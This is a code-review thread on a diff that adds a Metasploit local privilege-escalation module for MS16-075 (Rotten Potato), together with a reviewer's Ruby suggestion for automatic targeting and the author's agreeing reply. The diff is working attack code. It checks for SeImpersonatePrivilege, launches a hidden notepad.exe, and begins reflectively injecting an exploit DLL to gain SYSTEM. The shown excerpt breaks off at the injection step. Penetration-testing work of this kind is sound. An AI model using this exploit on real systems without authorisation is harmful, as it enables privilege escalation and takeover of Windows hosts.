modules/exploits/windows/local/ms16_075_reflection.rb

```diff
@@ -0,0 +1,135 @@
+        does not spawn as SYSTEM, however once achieving a shell, one can easily
+        use incognito to impersonate the token.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'FoxGloveSec', # the original Potato exploit
+          'breenmachine', # Rotten Potato NG!
+          'Mumbai' # Austin : port of RottenPotato for reflection & quick module
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'none',
+          'WfsDelay' => '20',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'Payload'         =>
+        {
+          'DisableNops' => true
+        },
+      'References'      =>
+        [
+          ['MSB', 'MS16-075'],
+          ['CVE', '2016-3225'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
+          ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
+          ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
+        ],
+      'DisclosureDate' => 'Jan 16 2016',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check_arch
+    os = sysinfo["OS"]
+
+    if sysinfo["Architecture"] =~ /(wow|x)64/i
+      if session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"] == "\x00\x00\x00\x00"
+        arch = ARCH_X64
+      else
+        arch = ARCH_X86
+      end
+    elsif sysinfo["Architecture"] == ARCH_X86
+      arch = ARCH_X86
+    end
+
+    return arch
+  end
+
+  def check
+    privs = client.sys.config.getprivs
+    if privs.include?('SeImpersonatePrivilege')
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::None, 'User does not have the SeImpersonate Privilege')
+    end
+
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    end
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    architecture = check_arch
```

Comment:
As you're detecting the architecture, you could probably implement automatic targeting too.

Something like:

```ruby
      'Targets'        =>
        [
          ['Automatic', {}],
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],

# ...

    if target.name.eql? 'Automatic'
      case check_arch
      when ARCH_X86
        my_target = targets[1]
      when ARCH_X64
        my_target = targets[2]
      else
        fail_with Failure::NoTarget, 'Unable to automatically select a target'
      end
    else
      my_target = target
    end
    print_status "Using target: #{my_target.name}"

    if my_target =~ /x64/
      dll_file_name = 'rottenpotato.x64.dll'
    else
      dll_file_name = 'rottenpotato.x86.dll'
    end
```

Reply:
Hm , I'll definitely do that, its a far better idea then what I'd done